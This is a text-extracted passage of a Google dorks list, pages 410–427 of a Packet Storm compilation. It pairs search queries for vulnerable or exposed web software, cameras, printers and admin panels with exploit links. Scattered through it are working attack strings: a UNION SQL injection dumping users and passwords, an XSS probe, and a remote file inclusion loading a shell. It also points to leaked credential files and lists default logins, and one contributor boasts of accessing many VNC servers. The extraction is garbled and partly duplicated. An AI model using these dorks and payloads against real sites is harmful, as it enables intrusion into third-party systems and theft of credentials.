Vbulletin installation wizards, allowusers to modify installation parameters.May also reveal sql username,password and table installations.Author: ScOrPiOn

inurl:/vb/install/upgrade.php inurl:/vb/install/upgrade.php Vbulletin custom updrade wizards.

Author: ScOrPiOn

inurl:com_amresurrected inurl:com_amresurrected

Submitter: Bl4ck.Viper SQL Injection:index.php?option=com_amresurrected&Itemid=[Sqli]

allinurl:/xampp/security.php allinurl:/xampp/security.php

XAMPP Security Setting PageInformation Disclosure. Author:modpr0be

"POWERED BY:WEBINSPIRE" "POWERED BY: WEBINSPIRE"

Author: ghost-dz SQL Injection:http://server/pages.php?id=30+and+1=0+union+select+1,concat(id,0x3a,usr,0x3a,pwd,0x3a,email),3,4,5,6+from+utenti--

"Powered ByPageAdmin CMS

"Powered By PageAdmin CMSFree Version"

Author: Sun Army XSS:/include/search.aspx?keycode=">xss

Page 410: Packetstorm Google Dorks List

Free Version" ByTakpar&type=1&language=eninurl:"produtos.asp?produto=" inurl:"produtos.asp?produto=" Submitter: Br0ly http://www.exploit-

db.com/exploits/15776

inurl:com_jeauto inurl:com_jeauto LFI: http://www.exploit-db.com/exploits/15779

allinurl:index.php?db=information_schema

allinurl:index.php?db=information_schema

Submitter: modpr0be phpMyAdminDirect Access to information_schemaDatabase

"Powered byCubeCart 3.0.4" "Powered by CubeCart 3.0.4" CSRF:http://www.exploit-

db.com/exploits/15822

"Powered byKaiBB 1.0.1" "Powered by KaiBB 1.0.1"

MultipleVulnerabilities:http://www.exploit-db.com/exploits/15846/

"Website Designby Rocktime" "Website Design by Rocktime"

Submitter: n0n0xhttp://server/product.php?fdProductId=[SQL Injection]

"Powered byUNO.com.my" "Powered by UNO.com.my"

Submitter: SiKodoQhttp://127.0.0.1/[path]/page.php?pid=[SQLi]

"/index.php?id=cmp-noticias" "/index.php?id=cmp-noticias"

Submitter: xoronhttp://server/index.php?id=cmp-noticias&n=[SQLi]

inurl:"/gadmin/index.php" inurl:"/gadmin/index.php"

Author: AtT4CKxT3rR0r1ST SQLInjection:www.site.com/gallery.php?id=null[SqlInjection]

"Powered byYourTube v1.0" "Powered by YourTube v1.0"

Author: AtT4CKxT3rR0r1ST CSRF:http://www.exploit-db.com/exploits/15892

inurl:"com_eventcal" inurl:"com_eventcal"

Author : AtT4CKxT3rR0r1ST[[email protected]] RFI:www.site.com/components/com_eventcal/eventcal.php?mosConfig_absolute_path=[shell.txt?]

"POWERED BYALITALK" "POWERED BY ALITALK" intext:"POWERED BY ALITALK"

"Powered byphpMySport" "Powered by phpMySport"

intext:"Powered by phpMySport"Multiple Vulnerabilities:http://www.exploit-db.com/exploits/15921/

inurl:"jscripts/tiny inurl:"jscripts/tiny_mce/plugins/tiny Author: DigiP Multiple Vulnerabilities:

Page 411: Packetstorm Google Dorks List

_mce/plugins/tinybrowser/" ORinurl:"jscripts/tiny_mce/plugins/tinybrowser/" "indexof"

browser/" ORinurl:"jscripts/tiny_mce/plugins/tinybrowser/" "index of"

http://www.exploit-db.com/exploits/9296/

"TinyBB 2011 allrights reserved" "TinyBB 2011 all rights reserved"

Submitter: Aodrulez SQL Injection:http://www.exploit-db.com/exploits/15961/

"inurl:cultbooking.php" "inurl:cultbooking.php"

CultBooking Multiple Vulnerabilities:http://www.exploit-db.com/exploits/16028/

inurl:"/plugins/ImageManager/manager.php"

inurl:"/plugins/ImageManager/manager.php"

Author: PenetraDz Shell Upload Vuln:manager/media/editor/plugins/ImageManager/manager.php

"Powered by: PHPLink Directory" "Powered by: PHP Link Directory" CSRF Vuln: http://www.exploit-

db.com/exploits/16037/

inurl:"ab_fct.php?fct=" inurl:"ab_fct.php?fct="

Multiple Vulnerabilities:http://www.exploit-db.com/exploits/16044

Photo Gallerypowered byTinyWebGallery1.8.3

Photo Gallery powered byTinyWebGallery 1.8.3

Multiple Vulnerabilities: Non-persistent XSS + Directory Traversal:http://www.exploit-db.com/exploits/16090

:inurl:mj_wwwusr

http://www.google.com/#sclient=psy&hl=en&safe=off&site=&source=hp&q=:inurl%3Amj_wwwusr&aq=f&aqi=&aql=&oq=&pbx=1&fp=2dcb6979649afcb0

http://www.exploit-db.com/exploits/16103

allintext:/qcodo/_devtools/codegen.php

allintext:/qcodo/_devtools/codegen.php

Information Disclosure:http://www.exploit-db.com/exploits/16116

"Powered ByDew-NewPHPLinksv.2.1b"

"Powered By Dew-NewPHPLinksv.2.1b"

SQL Injection: http://www.exploit-db.com/exploits/16122

"made visual bysightFACTORY" "made visual by sightFACTORY"

Author : eXeSoul [#]http://server/accommodations.php?contentid=[sqli] [#]http://server/chamber_business.php?mid=[sqli] [#]http://server/work.php?mid=[sqli] [#]http://server/members.php?id=[SQLi]

Page 412: Packetstorm Google Dorks List

"powered byzipbox media" "powered by zipbox media" Author:XaDaL

http://site.com/album.php?id=[SQLi]intext:db_passinurl:settings.ini intext:db_pass inurl:settings.ini Submitter: Bastich mysql.nimbit.com

dashboard settingsintext:"Poweredby EZPub" intext:"Powered by EZPub" SQL Injection: http://www.exploit-

db.com/exploits/16941

inurl:"sitegenius/topic.php" inurl:"sitegenius/topic.php"

Submitter: dR.sqL SQL Injection:http://localhost/sitegenius/topic.php?id=[SQLi]

"POWERED BYLOG1 CMS" "POWERED BY LOG1 CMS"

Multiple Vulnerabilities:http://www.exploit-db.com/exploits/16969/

intext:"Poweredby VoiceCMS" intext:"Powered by VoiceCMS"

Submitter: p0pc0rn SQL Injection:http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id]http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]

+intext:"AWSTATS DATA FILE"filetype:txt

+intext:"AWSTATS DATA FILE"filetype:txt

Shows data downloads containingstatistics on the site.Made byAwstatsThe best dork for thatsystem.By: 67pc

inurl:/xampp inurl:/xampp this dork looks for servers with xamppinstalled

"Powered bykryCMS" "Powered by kryCMS" kryCMS Version 3.0 SQL Injection.

Author: tempe_mendoaninurl:"mod.php?mod=blog"intext:"powered byDIY-CMS"

inurl:"mod.php?mod=blog"intext:"powered by DIY-CMS"

DIY-CMS blog mod SQL Injection.Author: snup

inurl:"*.php?*=*.php"intext:"Warning:include" -inurl:.html -site:"php.net" -site:"stackoverflow.com" -inurl:"*forums*"

inurl:"*.php?*=*.php"intext:"Warning: include" -inurl:.html -site:"php.net" -site:"stackoverflow.com" -inurl:"*forums*"

PHP Error Messages

"Powered bysendcard - anadvanced PHP e-card program"

"Powered by sendcard - anadvanced PHP e-card program"

SendCard 3.4.0 UnauthorizedAdministrative Access:http://www.exploit-db.com/exploits/2117

Page 413: Packetstorm Google Dorks List

"This is a Free &Open Sourcemailing listmanager"

"This is a Free & Open Sourcemailing list manager" Open Newsletter

+intext:"AWSTATS DATA FILE"filetype:txt

+intext:"AWSTATS DATA FILE"filetype:txt

Shows data downloads containingstatistics on the site.Made byAwstatsThe best dork for thatsystem.By: 67pc

inurl:/xampp inurl:/xampp this dork looks for servers with xamppinstalled

"Powered bykryCMS" "Powered by kryCMS" kryCMS Version 3.0 SQL Injection.

Author: tempe_mendoaninurl:"mod.php?mod=blog"intext:"powered byDIY-CMS"

inurl:"mod.php?mod=blog"intext:"powered by DIY-CMS"

DIY-CMS blog mod SQL Injection.Author: snup

inurl:"*.php?*=*.php"intext:"Warning:include" -inurl:.html -site:"php.net" -site:"stackoverflow.com" -inurl:"*forums*"

inurl:"*.php?*=*.php"intext:"Warning: include" -inurl:.html -site:"php.net" -site:"stackoverflow.com" -inurl:"*forums*"

PHP Error Messages

site*.*.*/webalizerintitle:"UsageStatistics"

site*.*.*/webalizer intitle:"UsageStatistics"

Shows usage statistics of sites. Includesmonthy reports on the IP addresses,user agents, and more, of the viewersof the sites, the most active first.

intext:"You mayalso donatethrough theMoneybookersaccount mb@dd-wrt"

intext:"You may also donatethrough the Moneybookers accountmb@dd-wrt"

Still find alot of equipment runningv24 sp1

inurl:/wp-content/w3tc/dbcache/

inurl:/wp-content/w3tc/dbcache/ - Jay Townsend

seyeonFlexWATCHcameras

intitle:flexwatch intext:"Home pagever"

seyeon provides various type ofproducts and software to build up aremote video monitoring andsurveillance system over the TCP/IPnetwork. FlexWATCH Network video

Page 414: Packetstorm Google Dorks List

server series has built-in Web serverbased on TCP/IP technology. It alsohas an embedded RTOS.The adminpages are athttp://[sitename]/admin/aindex.htm.

intitle:"Live View/ - AXIS" intitle:"Live View / - AXIS"

These AXIS cams seem to run theirown http server (Boa/0.94.13). Thesetup button can be hidden. Thedevices ship with a default passwordpair (quoting from the FAQ): "Bydefault, the username will be root andthe password will be pass. If these arenot the current values, performing afactory default on the unit will reset thepassword to pass."Some models foundin this search:- AXIS 205 version 4.0x-AXIS 210 Network Camera version:4.0x- AXIS 241S Video Serverversion: 4.0x- AXIS 241Q VideoServer version 4.0x

Xerox Phaser 740Color Printer

"Phaser 740 Color Printer" "printernamed: "

This product is supported but no longersold by Xerox in the United States.Replacement Product: Phaser6250.Configuration pages are passwordprotected.

Xerox Phaser 8200 "Phaser 8200" " Xerox" "refresh" "Email Alerts"

Brochure info: "The Phaser 8200 usessolid ink, an alternative technology tolaser printing. Unlike typical laserprinters, solid ink doesn't requirethrowaway cartridges to get ink in theprinter." Using the Internet, yourprinter can send performanceinformation to our computers.PhaserSMART, our diagnostic system,examines the information, diagnosesthe issue, and immediately walks youthrough a proposed solution. Automaticalerts minimize printer managementproblems. Alerts notify you via emailwhen it's time to replace supplies, orwhen service is required."Moderatornote: you may not be able to connect tothe links Google gives if the printersare turned off when not in use.

Xerox Phaser 840 "Phaser 840 Color Printer" "Current This product is supported but no longer

Page 415: Packetstorm Google Dorks List

Color Printer Status" "printer named:" sold by Xerox in the United States.Support and supplies for this productcontinue to be available online.Replacement Product: Phaser 8400Thissearch finds the PhaserLinkTM PrinterManagement Software for the Phaser840 Color Printer. It seems at least the"Print DEMO" page works withoutauthentication.

(inurl:"ars/cgi-bin/arweb?O=0" |inurl:arweb.jsp) -site:remedy.com -site:mil

(inurl:"ars/cgi-bin/arweb?O=0" |inurl:arweb.jsp)

From the vendor site: "Remedys ActionRequest System is for automatingService Management businessprocesses. More than 7,000 customersknow that AR System is the way toautomate key business processes. ARSystem includes tools for application-to-application integration, includingsupport for Web Services that requiresno additional programming."Login isoften 'guest' with no password. Or nologin is required. An attacker cansearch the database for sensitive info(passwords), and search profiles toobtain usernames, emails.

ext:cgiinurl:ubb6_test ext:cgi inurl:ubb6_test.cgi

The UBB trial version contains filesthat are not safe to keep online aftergoing live. The install files clearly stateso:CAUTIONS Do not leave pathto.aspor ubb6_test.cgi on your server. Deletethem from the server when you aredone. Leaving them in place poses asecurity risk."This is the UBB6Permissions & Paths DiagnosticScript.Example:UBB Version 6.1.0.3Perl Version 5.006 Server TypeApache/1.3.27 (Unix) (Red-Hat/Linux)mod_fastcgi/2.2.10 mod_jk/1.2.0mod_perl/1.24_01 PHP/4.2.2FrontPage/5.0.2 mod_ssl/2.8.12OpenSSL/0.9.6b check path: 1. checkpermission to write new files in thisdirectory2. check for the 'required' filesin both the CGI and this directory3.check my read/write permissions on allthe variables files4. check my absolute

Page 416: Packetstorm Google Dorks List

paths in general settings if availableversion 2.1 2001 Infopop CorporationAll Rights Reserved

Login ("Poweredby Jetbox OneCMS " | "Poweredby Jetstream *")

Login ("Powered by Jetbox OneCMS " | "Powered by Jetstream *")

Jetbox is a content managementsystems (CMS) that uses MySQL orequivalent databases. There is avulnerability report at SF wich I thinkis overrated, but I will mentionhere:http://www.securityfocus.com/bid/10858/discussion/The file holding thepassword is called:"http://.../includes/general_settings.inc.php"It does come with defaultpasswords and that is allways asecurity risk. The administration isavailable via /admin/Username: admin,Password: admin1 .

("Fiery WebTools"inurl:index2.html)| "WebToolsenable * *observe, *, * * *flow * print jobs"

("Fiery WebTools"inurl:index2.html) | "WebToolsenable * * observe, *, * * * flow *print jobs"

Fiery WebTools offers many of thesame capabilities of the CommandWorkStation, via a Java-enabled Webbrowser. All job control options suchas job merging, edition and previews,as well as information on the status ofthe jobs are accessible through FieryWebTools.

intext:SQLiteManagerinurl:main.php

intext:SQLiteManagerinurl:main.php

sQLiteManager is a tool Web multi-language of management of data basesSQLite. # Management of several database (Creation, access or upload basic)# Management of the attached bases ofdonnes # Creation, modification andremoval of tables and index. #Insertion, modification, suppression ofrecording in these tables

intitle:"DirectoryListing, Index of/*/"

intitle:"Directory Listing, Index of/*/"

Vendor page:"Einfache HTTP-Server-Software fr privates Homepage-Hosting oder groe Uploads."smallHTTP server software for privatehompage hosting or big uploads.

intitle:"index.of *"admin news.aspconfigview.asp

intitle:"index.of *" admin news.aspconfigview.asp

With Compulive News you can enterthe details of your news items onto awebform and upload images throughyour browser. It integrates seamlesslywithin your website.When you open

Page 417: Packetstorm Google Dorks List

your CNU5 zip there is a news foldercreated with three subfolders: htmlarea,images and admin. In the news folderis your database file news.mdb.Forsecurity purposes the manualrecommends that you immediatelyrename this database to a name of yourown choosing thereby making it harderfor anyone to download your newsdatabase.The database contains theplain text password. PS: this search isbased on the index.of method. Thereare other ways to find this software, butfinding the news database becomes alot more difficult for an attacker thatway.

"Copyright 2002Agustin DondoScripts"

"Copyright 2002 Agustin DondoScripts"

CoolPHP has multiple vulnerabilities:*Cross-Site Scripting vulnerability(index.php)* A Path DisclosureVulnerability (index.php)* Local fileinclude Vulnerability with DirectoryTraversal info:http://www.securityfocus.com/archive/1/378617

"IMail Server WebMessaging"intitle:login

"IMail Server Web Messaging"intitle:login

IMail Server from Ipswitch is amessaging solution with 60 millionusers worldwide. It contains thefeatures and safeguards you needwithout the complexity of expensivesolutions like Microsoft Exchange orgroupware which challenges even themost experienced administrators.Thisis a login portal search. Security Focusshows a list of vulnerabilities about thissoftware.

ext:nsf nsf -gov -mil ext:nsf nsf -gov -mil

Domino is server technology whichtransforms Lotus Notes into an Internetapplications server. Domino bringstogether the open networkingenvironment of Internet standards andprotocols with the powerful applicationdevelopment facilities of Notes,providing you with the ability torapidly develop a broad range ofbusiness applications for the Internet

Page 418: Packetstorm Google Dorks List

and Intranet.This is a generic search forLotus Domino files. It identifiesDomino users. Search the GBDB formore variations on this theme.

inurl:statrep.nsf -gov inurl:statrep.nsf -gov

Domino is server technology whichtransforms Lotus Notes into an Internetapplications server. Domino bringstogether the open networkingenvironment of Internet standards andprotocols with the powerful applicationdevelopment facilities of Notes,providing you with the ability torapidly develop a broad range ofbusiness applications for the Internetand Intranet. This search finds statisticspages generated by Domino.Information on these pages includesOperating System, Disk space,Usernames and full pathdisclosure.Example: * 1. StatisticsReports - 1. System * 1. StatisticsReports - 2. Mail & Database * 1.Statistics Reports - 3. Communications* 1. Statistics Reports - 4. Network * 1.Statistics Reports - 5. Clusters * 1.Statistics Reports - 6. Web Server &Retriever * 1. Statistics Reports - 7.Calendaring Scheduling * 2. Alarms *3. Events * 4. Spreadsheet Export * 5.Graphs - 1. System Statistics * 5.Graphs - 2. System Loads * 5. Graphs -3. System Resources * 6. TroubleTickets - 1. Alarm * 6. Trouble Tickets- 2. Event * 7. Analysis Report * 8.File Statistics * 9. Single Copy ObjectStore Statistics

inurl:log.nsf -gov inurl:log.nsf -gov

Domino is server technology whichtransforms Lotus Notes into an Internetapplications server. Domino bringstogether the open networkingenvironment of Internet standards andprotocols with the powerful applicationdevelopment facilities of Notes,providing you with the ability torapidly develop a broad range of

Page 419: Packetstorm Google Dorks List

business applications for the Internetand Intranet. This search finds Dominolog files. These can be revealing,including information aboutdbconnect.nsf files, path information,etc.Example: * Database-Sizes *Database-Usage * Mail Routing Events* Miscellaneous Events * NNTPEvents * Object Store Usage * PassthruConnections * Phone Calls-By Date *Phone Calls-By User * ReplicationEvents * Sample Billing * Usage-ByDate * Usage-ByUserExample:2004/04/14 07:51:00AM ATTEMPT TO ACCESSDATABASE mtstore.ntf byitisdom/ITIS/ITRI was denied

"BlackBoard1.5.1-f | 2003-4 byYves Goergen"

"BlackBoard 1.5.1-f | 2003-4 byYves Goergen"

bugtraq id 11336objectclass InputValidation Errorcve CVE-MAP-NOMATCHremote YeslocalNopublished Oct 06, 2004updated Oct06, 2004vulnerable BlackBoardInternet Newsboard SystemBlackBoard Internet NewsboardSystem 1.5.1BlackBoard InternetNewsboard System is reported prone toa remote file include vulnerability. Thisissue presents itself because theapplication fails to sanitize user-supplied data properly. This issue mayallow an attacker to include maliciousfiles containing arbitrary script code tobe executed on a vulnerablecomputer.BlackBoard InternetNewsboard System version 1.5.1 isreported prone to this vulnerability. Itis possible that prior versions areaffected as well.

intext:("UBB.threads6.2"|"UBB.threads6.3") intext:"You *not logged *" -site:ubbcentral.com

intext:("UBB.threads6.2"|"UBB.threads 6.3")intext:"You * not logged *" -site:ubbcentral.com

UBB.Threads 6.2.*-6.3.* one charbruteforce vulnerability:http://www.k-otik.com/exploits/20041116.r57ubb.pl.php

Page 420: Packetstorm Google Dorks List

inurl:"ipp/pdisplay.htm" inurl:"ipp/pdisplay.htm"

Providing a standout printing solution,Novell iPrint offers secure printservices that extend across multiplenetworks and operatingsystemsbringing the power of the Netto your business environment. Thissearch locates various online printers.

intext:"StorageManagementServer for"intitle:"ServerAdministration"

intext:"Storage Management Serverfor" intitle:"Server Administration"

These pages can reveal informationabout the operating system and patchlevel, as well as providing a loginportal for hackers to attack. "As part ofthe IBM TotalStorage Open SoftwareFamily, IBM Tivoli Storage (ADSM)Manager protects your organization'sdata from hardware failures and othererrors by storing backup and archivecopies of data on offline storage."

inurl:"sitescope.html"intitle:"sitescope"intext:"refresh" -demo

inurl:"sitescope.html"intitle:"sitescope" intext:"refresh" -demo

Mercury SiteScope designed to ensurethe availability and performance ofdistributed IT infrastructures e.g.,servers, operating systems, networkdevices, network services, applications,and components. Some pages may beIP restricted.

inurl:":631/printers" -php -demo inurl:":631/printers" -php -demo

CUPS provides a portable printinglayer for UNIX-based operatingsystems. It has been developed by EasySoftware Products to promote astandard printing solution for all UNIXvendors and users. CUPS provides theSystem V and Berkeley command-lineinterfaces. CUPS uses the InternetPrinting Protocol ("IPP") as the basisfor managing print jobs and queues.The Line Printer Daemon ("LPD")Server Message Block ("SMB"), andAppSocket (a.k.a. JetDirect).

intitle:"MXControl Console""If you can'tremember"

intitle:"MX Control Console" "Ifyou can't remember"

MX Logics customizable and easy-to-use MX Control ConsoleSM is acentralized email threat managementpolicy platform that provides you withone interface for managing allcorporate-wide email threats,protection and security. With the MXControl Console, you can easily

Page 421: Packetstorm Google Dorks List

configure and control your emailprotection and security based on youroverall corporate email policies.

intitle:"NovellWeb Services"intext:"Select aservice and alanguage."

intitle:"Novell Web Services"intext:"Select a service and alanguage."

"Novell GroupWise is an enterprisecollaboration system that providessecure e-mail, calendaring, scheduling,and instant messaging. GroupWise alsoincludes task management, contactmanagement, document management,and other productivity tools.GroupWise can be used on yourdesktop on Linux, Windows*, orMacintosh; in a Web browseranywhere you have an Internetconnection; and even on wirelessdevices. Your GroupWise system canbe set up on NetWare, Linux,Windows, or any combination of theseoperating systems."

intitle:Loginintext:"RT isCopyright"

intitle:Login intext:"RT isCopyright"

RT is an enterprise-grade ticketingsystem which enables a group ofpeople to intelligently and efficientlymanage tasks, issues, and requestssubmitted by a community ofusers.Versions including 2.0.13 arevulnerable to injection, checkoutSecurityFocus BID 7509

inurl:"8003/Display?what=" inurl:"8003/Display?what="

Norton AntiVirus for GatewaysEasilyadministered from anywhere via anHTML interface, it scans compressedand encoded files at the SMTPgateway, including a nearly unlimitednumber of file extensions in ZIP,UUENCODE, and MIME formats.Administrators have flexible optionsfor handling infected files, schedulingvirus definition updates viaLiveUpdate, and generating reports.

"Microsoft CRM :UnsupportedBrowser Version"

"Microsoft CRM : UnsupportedBrowser Version"

Microsoft CRM Login portal.MSsays:Microsoft CRM integrates withMicrosoft Office, Microsoft BusinessSolutions for Financial Management,and other business systems to giveemployees a complete view ofcustomer information. The ease of

Page 422: Packetstorm Google Dorks List

integration with Microsoft Office is ofparticular valueenabling staff to accessMicrosoft CRM information fromMicrosoft Office Outlook and workonline or offline with access to salesfunctionality.

+"HSTSNR" -"netop.com" +"HSTSNR" -"netop.com"

This search reveals NetOp license files.From the netop website: "NetOpRemote Control is the mostcomprehensive, effective and security-conscious way to maintain your IToperations. Designed to fit into allenvironments, NetOp lets you accessusers running virtually any operatingsystem, including Windows, Linux,Mac OS X and Solaris. Location isntterribly important either. The programoffers unrivalled connectivity,supporting all standard communicationprotocols. Finally, NetOp is also theideal way to manage and administrateyour servers. The system contains asweeping range of remote managementtools, all available on one easy-to-useconsole."

intext:"Pleaseenter correctpassword forAdministratorAccess. Thankyou" "Copyright2003 SMCNetworks, Inc. Allrights reserved."

intext:"Please enter correctpassword for Administrator Access.Thank you" "Copyright 2003 SMCNetworks, Inc. All rights reserved."

Finds SMC Routers.

intitle:endymion.sak.mail.login.page |inurl:sake.servlet

intitle:endymion.sak.mail.login.page | inurl:sake.servlet

sak Mail, servlet-based web emailsystem, designed for scaling to largenumbers of concurrent users. Intendedfor large universities or enterprise-levelmail system

intitle:"SFXAdmin- sfx_global" |intitle:"SFXAdmin- sfx_local" |intitle:"SFXAdmin- sfx_test"

intitle:"SFXAdmin - sfx_global" |intitle:"SFXAdmin - sfx_local" |intitle:"SFXAdmin - sfx_test"

Just another logon page search, this oneis for SFX, a link server from ExLibris, delivers linking services in thescholarly information environment.SFX is also a component in themanagement of electronic resources in

Page 423: Packetstorm Google Dorks List

a library.

"Powered byDWMail"passwordintitle:dwmail

"Powered by DWMail" passwordintitle:dwmail

What is DWmail?: DWmail is an'intelligent' Web based emailapplication written in the scriptinglanguage, PHP. DWmail allows youand your visitors to access, manage andsend email using any POP3 or IMAP4compliant email account. Simply enteryour email address and password tocheck your email.

intitle:"WorldClient" intext:"(2003|2004) Alt-NTechnologies."

intitle:"WorldClient" intext:"(2003|2004) Alt-N Technologies."

MDaemon , Windows-based emailserver software, contains full mailserver functionality and control with astrong emphasis on security to protectyour email communication needs.

intitle:"PowerDownload"("PowerDownloadv3.0.2 " |"PowerDownloadv3.0.3 " ) -site:powerscripts.org

intitle:"PowerDownload"("PowerDownload v3.0.2 " |"PowerDownload v3.0.3 " ) -site:powerscripts.org

The PowerDownload program (version3.0.2 and 3.0.3) contains a seriousvulnerability. Vulnerability discovery:SoulBlack - Security Research(http://soulblack.com.ar)Date:05/31/2005Severity: High. RemoteUsers Can Execute ArbitraryCode.Affected version: v3.0.2 &v3.0.3vendor:http://www.powerscripts.org/* Fix*Contact the Vendor* References*http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt

intext:"CalendarProgramCopyright 1999Matt Kruse" "Addan event"

intext:"Calendar Program Copyright1999 Matt Kruse" "Add an event"

This search finds all pages that allowyou to add events in Mark Kruse'sCalendarScript. This script seems to beVERY vulnerable to HTML injectiontechniques.

[WFClient]Password=filetype:ica

[WFClient] Password= filetype:ica

The WinFrame-Client infos needed byusers to connect toCitrix ApplicationServers (e.g. Metaframe).Oftenlinked/stored on Webservers andsometimes reachable fromInternet.Password is 16-byte-Hash ofunknown encryption (MSCHAPv2?).File Extension is "ica" the so calledCitrix Independent ComputingArchitecture.These files may contain

Page 424: Packetstorm Google Dorks List

login information (Username,Password, Domain).

intitle:"CiscoCallManager UserOptions Log On""Please enter yourUser ID andPassword in thespaces providedbelow and clickthe Log On buttonto co

intitle:"Cisco CallManager UserOptions Log On" "Please enter yourUser ID and Password in the spacesprovided below and click the LogOn button to co

[quote]Cisco CallManagerCallManageris a FREE web application/interfaceincluded with your VoIP telephoneservice. It allows you to change andupdate settings on your phone withouthaving to contact theTelecommunications Help Desk.Voiceover IP telephone users Logon to CiscoCallManager at:http://XXXXXX/ccmuser/logon.asp*User ID your UWYO Domainusername* Password initial passwordis 12341234Please create your ownunique password after your initiallogon[/quote]There are severalvulnerbilities for CallManager

"Copyright 2004Digital Scribev.1.4"

"Copyright 2004 Digital Scribev.1.4"

Digital Scribe v1.4 Login Bypass /SQL injection / remote codeexecutionsoftware site:http://www.digital-scribe.org/description: "Teachers havefull control through a web-basedinterface. Designedfor easy installationand even easier use, the Digital Scribehas been used in thousands of schools.No teacher or IT Personnel needs toknow any computer languages in orderto install and use this intuitivesystem.rgodsite:http://rgod.altervista.orgemail: retrogodat aliceposta it

http://www.google.com/search?q=intitle:%22WEB//NEWS+Personal+Newsmanagement%22+intext:%22%C2%A9+2002-2004+by+Christian+Scheb+-+Stylemotion.de%22%2B%22

intitle:"WEB//NEWS PersonalNewsmanagement" intext:" 2002-2004 by Christian Scheb -Stylemotion.de"+"Version 1.4"+"Login"

WEB//NEWS 1.4 is prone to multipleSQL injection vulnerabilities. Theseissues are due to a failure in theapplication to properly sanitize user-supplied input before using it in SQLqueries.

intitle:"Admin intitle:"Admin Login" "admin Blogware Login Portal: "An exciting

Page 425: Packetstorm Google Dorks List

Login" "adminlogin" "blogware"

login" "blogware" and innovative tool for creating orenhancing your web presence. It isyour key to easy publishing on theWorld Wide Web share pictures, video,links, documents, newsletters, opinionsand more, with family, friends andcolleagues. Now you can have awebsite without being a Webmaster. Itssimple! There is no HTML to learn andno new software to download andinstall."

Powered by PHP-Fusion v6.00.1092003-2005. -php-fusion.co.uk

Powered by PHP-Fusion v6.00.1092003-2005. -php-fusion.co.uk

this is the dork: Powered by PHP-Fusion v6.00.109 2003-2005. -php-fusion.co.ukas it is, without quotes, forthe version I tested, prone toSQLInjection / administrative credentialsdisclosurethis my advisory/poc exploit:http://rgod.altervista.org/phpfusion600109.html

"iCONECT 4.1 ::Login" "iCONECT 4.1 :: Login"

This search finds the login page foriCONECTnxt, it enables firms tosearch, organize, and review electronicand document discovery informationincluding email, native files, andimages from anywhere in the world foreasy collaboration with outsidecounsel, branch offices, andconsultants. LAN and Web solutionsavailable.

"powered byGuppY v4"|"Sitecr avec GuppYv4"

"powered by GuppY v4"|"Site cravec GuppY v4"

Guppy remote code execution / variousarbitrary inclusion issuesadvisory &pocexploit:http://rgod.altervista.org/guppy459_xpl.html

"intitle:3300IntegratedCommunicationsPlatform"inurl:main.htm

"intitle:3300 IntegratedCommunications Platform"inurl:main.htm

logon portal to the mitel 330 integratedcommunications platform.[Mitel 3300Integrated Communications Platform(ICP) provides enterprises with ahighly scalable, feature-richcommunications system designed tosupport businesses from 30-60,000users. ...supporting networkingstandards such as Q.SIG, DPNSS, andMSDN .... enable their legacy PBX's, ]

Page 426: Packetstorm Google Dorks List

filetype:reg reg+intext:WINVNC3

filetype:reg reg +intext:WINVNC3

This can be used to get encoded vncpasswords which can otherwise beobtained by a local registry anddecoded by cain & abel. The query findregistry entries which can otherwise befound can locallyin:\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Passwordor\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\PasswordIf you area cain and abel user you'll and haveused this feature before you will knowhow useful this query is. Other thandecoded passwords you can also findother useful information on the VNCserver and its security. I havesuccessfully gained access to manyVNC servers.

(intitle:"WordPress SetupConfigurationFile")|(inurl:"setup-config.php?step=")

(intitle:"WordPress SetupConfiguration File")|(inurl:"setup-config.php?step=")

Alter setup configuration files.add?step=1

intitle:"b2evoinstaller"intext:"Installer frVersion"

intitle:"b2evo installer"intext:"Installer fr Version"

this page lets you to know someinteresting info on target machine,database name, username... it lets youto see phpinfo() and, if you knowdatabase password, lets you to injectarbitrary code inblogs/conf/_config.php, regardless ofmagic_quotes_gpc settings and launchcommands wrote a simple dictionaryattack tool fot this:http://retrogod.altervista.org/b2evo_16alpha_bf.html

("This Dragonflyinstallation was" |"Thanks fordownloadingDragonfly") -inurl:demo -inurl:cpgnuke.com

("This Dragonfly installation was" |"Thanks for downloadingDragonfly") -inurl:demo -inurl:cpgnuke.com

exploit and short explaination:http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html

intitle:("TrackerCam Live

intitle:("TrackerCam LiveVideo")|("TrackerCam Application

"TrackerCam is a software applicationthat lets you put your webcam on the

Page 427: Packetstorm Google Dorks List

Video")|("TrackerCam ApplicationLogin")|("Trackercam Remote") -trackercam.com

Login")|("Trackercam Remote") -trackercam.com

web, use it for surveillance, and dothings like access its video from a cellphone or upload its images to an FTP-server."

intitle:"DeviceStatus SummaryPage" -demo

intitle:"Device Status SummaryPage" -demo

hxxp://www.netbotz.com/products/index.htmlNetwork/server/room securityand enviromental alarm device.O yea,they have cameras on them, fun towatch IT people......wooIncludes:Temperature (F)Humidity(%)Air Flow (ft/min)AudioAlarm:Door Switch:

intitle:"Net2PhoneInit Page" intitle:"Net2Phone Init Page"

Net2Phone CommCenter is softwarethat allows you to make phone callsand send faxes to anywhere in theworld.

This page wasproduced usingSAM Broadcaster.Copyright SpacialAudio Solutions,LLC 1999 - 2004.

This page was produced using SAMBroadcaster. Copyright SpacialAudio Solutions, LLC 1999 - 2004.

samPHPweb (db.php commonpath)Remote File Inclusion Vulnerability -CVE: 2008-0143: http://www.exploit-db.com/exploits/4834

" ActiveKB v1.5Copyright " " ActiveKB v1.5 Copyright "

ActiveKB 1.5 Insecure CookieHandling/Arbitrary Admin Access -CVE: 2008-2338: http://www.exploit-db.com/exploits/5616

intext:2003-2008RC v3.1Developed by: GASoft

intext:2003-2008 RC v3.1Developed by: GA Soft

Rapid Classified 3.1 (cldb.mdb)Database Disclosure Vulnerability -CVE: 2008-6388: http://www.exploit-db.com/exploits/7324

Powered bylineaCMS 2006lineaPHP Group

Powered by lineaCMS 2006lineaPHP Group

lineaCMS Cross Site ScriptingVulnerability: http://www.exploit-db.com/exploits/10736

powered byCMSbrightwebsens

powered by CMSbright websens

CMSbright (id_rub_page) Remote SQLInjection Vulnerability - CVE: 2008-6991: http://www.exploit-db.com/exploits/6343

Powered by:Linkarity Powered by: Linkarity

Linkarity (link.php) Remote SQLInjection Vulnerability - CVE: 2008-4353: http://www.exploit-db.com/exploits/6455

